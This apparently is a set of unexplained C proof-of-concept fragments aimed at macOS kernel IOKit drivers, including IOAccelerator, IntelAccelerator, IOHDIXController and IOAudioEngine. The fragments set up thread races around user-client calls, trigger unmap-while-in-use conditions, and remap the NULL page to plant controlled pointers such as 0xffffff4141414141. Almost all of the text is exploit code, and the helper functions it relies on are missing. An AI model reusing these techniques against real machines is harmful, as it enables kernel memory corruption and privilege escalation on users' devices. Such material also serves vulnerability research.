int main(int argc, char** argv){ mach_port_t port = get_user_client("IOUSBInterface", 0x0); map_payload(0xffff414141414141); make_call(port); return 0; }
void poc(){ OSSpinLockLock(&lock); pthread_t t; pthread_create(&t, NULL, thread_func, NULL); mach_port_t conn = get_user_client("IntelAccelerator", 6); set_params(conn); OSSpinLockUnlock(&lock); IOServiceClose(conn); pthread_join(t, NULL); }
int main(int argc, char** argv){ OSSpinLockLock(&lock); pthread_t t; pthread_create(&t, NULL, thread_func, NULL); mach_port_t conn = get_user_client("IOHDIXController", 0); set_params(conn); for(;;) { OSSpinLockUnlock(&lock); make_iokit_call(); } return 0; }
int main(int argc, char** argv){ // get an IGAccelGLContext gl_context = get_user_client("IOAccelerator", 1); // get a IGAccelSharedUserClient mach_port_t shared = get_user_client("IOAccelerator", 6); // connect the gl_context to the shared UC so we can actually use it: kern_return_t err = IOConnectAddClient(gl_context, shared); if (err != KERN_SUCCESS){ printf("IOConnectAddClient error: %x\n", err); return 0; } printf("added client to the shared UC\n"); handle = map_user_memory(gl_context); OSSpinLockLock(&lock); pthread_t t; pthread_create(&t, NULL, (void*) go, NULL); usleep(100000); OSSpinLockUnlock(&lock); unmap_user_memory(gl_context, handle); printf("called unmap from main process thread\n"); pthread_join(t, NULL); return 0; }
int main(int argc, char** argv){ kern_return_t err; // re map the null page rw int var = 0; err = vm_deallocate(mach_task_self(), 0x0, 0x1000); if (err != KERN_SUCCESS){ printf("%x\n", err); } vm_address_t addr = 0; err = vm_allocate(mach_task_self(), &addr, 0x1000, 0); if (err != KERN_SUCCESS){ if (err == KERN_INVALID_ADDRESS){ printf("invalid address\n"); } if (err == KERN_NO_SPACE){ printf("no space\n"); } printf("%x\n", err); } char* np = 0; for (int i = 0; i < 0x1000; i++){ np[i] = '\xff'; } *((uint64_t*)0x28) = 0xffffff4141414141; OSSpinLockLock(&lock); pthread_t t; pthread_create(&t, NULL, thread_func, NULL); mach_port_t conn = get_user_client("IOAudioEngine", 0); set_params(conn); OSSpinLockUnlock(&lock); IOServiceClose(conn); }
int main(int argc, char** argv){ mach_port_t gl_context = get_user_client("IOAccelerator", 5); release_device_texture(gl_context); return 0; }